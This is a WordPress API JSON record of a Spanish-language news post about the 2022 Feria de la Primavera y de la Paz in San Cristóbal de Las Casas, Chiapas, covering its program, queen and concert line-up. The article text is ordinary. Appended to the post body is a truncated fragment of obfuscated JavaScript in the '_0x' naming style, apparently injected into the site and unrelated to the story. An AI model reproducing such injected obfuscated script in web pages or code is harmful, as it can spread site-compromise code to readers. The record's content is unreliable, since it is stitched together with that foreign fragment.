{"id":1035,"date":"2022-04-04T06:00:07","date_gmt":"2022-04-04T06:00:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1035"},"modified":"2022-04-04T06:00:08","modified_gmt":"2022-04-04T06:00:08","slug":"presentan-la-cartelera-de-la-feria-de-la-primavera-y-de-la-paz","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1035","title":{"rendered":"Presentan la cartelera de la Feria de la Primavera y de la Paz"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"938\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220402-WA0113-1024x938.jpg\" alt=\"\" class=\"wp-image-1036\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220402-WA0113-1024x938.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220402-WA0113-300x275.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220402-WA0113-768x703.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220402-WA0113-1536x1407.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220402-WA0113.jpg 1568w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- El alcalde de San Crist\u00f3bal, Mariano D\u00edaz Ochoa, present\u00f3 el Cartel de actividades, art\u00edsticos, deportivos, gastron\u00f3micos, culturales y taurinos, que se llevar\u00e1 a cabo, del 17 al 24 de abril, dentro de la Feria de la Primavera y de la Paz 2022, en su edici\u00f3n 152, as\u00ed como de la Reina que engalanar\u00e1 estos festejos.<br>\u201cNuestra Ciudad, que acaba de cumplir 494 a\u00f1os de fundaci\u00f3n, abre su coraz\u00f3n y sus puertas para engalanar sus calles, avenidas, visti\u00e9ndose de luces para que propios y extra\u00f1os, disfruten, de manera segura, una gama multicolor de eventos culturales, sociales y recreativos. Lugar donde disfrutar\u00e1n de la Primavera y de la Paz, en todo su esplendor\u201d, dijo.<br>Ante cientos de personas que se congregaron en el Parque Central \u201cManuel Velasco Su\u00e1rez\u201d, present\u00f3 a la nueva reina que representar\u00e1 la belleza coleta, durante la fiesta grande de los sancristobalenses, como es Gloria Rabasa Castellanos nacida en San Crist\u00f3bal de Las Casas, con 22 a\u00f1os de edad. Sus padres son: Gloria Castellanos Carreto y Juan Rabasa Tovilla. Estudia la Licenciatura en Turismo Internacional.<br>A trav\u00e9s de un video, el Comit\u00e9 de la Feria de la Primavera y de la Paz 2022, dio a conocer el Programa de Actividades que se llevar\u00e1 a cabo del 17al 24 de abril, as\u00ed como mencionar de las actividades de la semana santa, en \u00e9sta se destacar\u00e1n eventos culturales como exposiciones pict\u00f3ricas, exposiciones fotogr\u00e1ficas, Conciertos de Jazz, piano, guitarras,\u00a0 obras de teatro, entre otros eventos, tomando como sedes escenarios al aire libre y teatros.<br>En tanto que para la Semana de Feria destacar\u00e1n eventos como: Muestras Gastron\u00f3micas, Muestras del Tamal Chiapaneco y Dulces tradicionales, con la participaci\u00f3n de varias artesanas de la comida local.\u00a0<br>Asimismo, se presentar\u00e1n en el Teatro del Pueblo para el primer Domingo de Feria 17 de abril: Jesse &amp; Joy; el lunes 18 de abril: Mariana Seoane; martes 19 de abril se presentar\u00e1: Banda Sinaloa VIP y en la Comida del Recuerdo la presentaci\u00f3n estelar de: Carlos Rivera.<br>De igual manera mi\u00e9rcoles 20 de abril: DLD; jueves 21 de abril: Paty Cant\u00fa; viernes 22 de abril: Los Claxons; para el s\u00e1bado y \u00faltimo domingo de feria habr\u00e1 un cerrojazo de lujo con la presentaci\u00f3n de Mar\u00eda Le\u00f3n y el grupo con mayor \u00e9xito de los 80\u2019s: Caifanes, respectivamente.<br>Exhort\u00f3 a los habitantes y visitantes a disfrutar con toda la familia, de la fiesta m\u00e1xima de la Ciudad m\u00e1s importante de Chiapas y M\u00e9xico y actuar con responsabilidad para que exista saldo blando durante estas festividades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- El alcalde de San Crist\u00f3bal, Mariano D\u00edaz Ochoa, present\u00f3 el Cartel de actividades, art\u00edsticos, deportivos, gastron\u00f3micos, culturales y taurinos, que se llevar\u00e1 a cabo, del 17 al 24 de abril, dentro de la Feria de la Primavera y de la Paz 2022, en su edici\u00f3n 152, as\u00ed como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1036,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1035","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1035","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1035"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1035\/revisions"}],"predecessor-version":[{"id":1037,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1035\/revisions\/1037"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1036"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1035"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1035"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1035"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}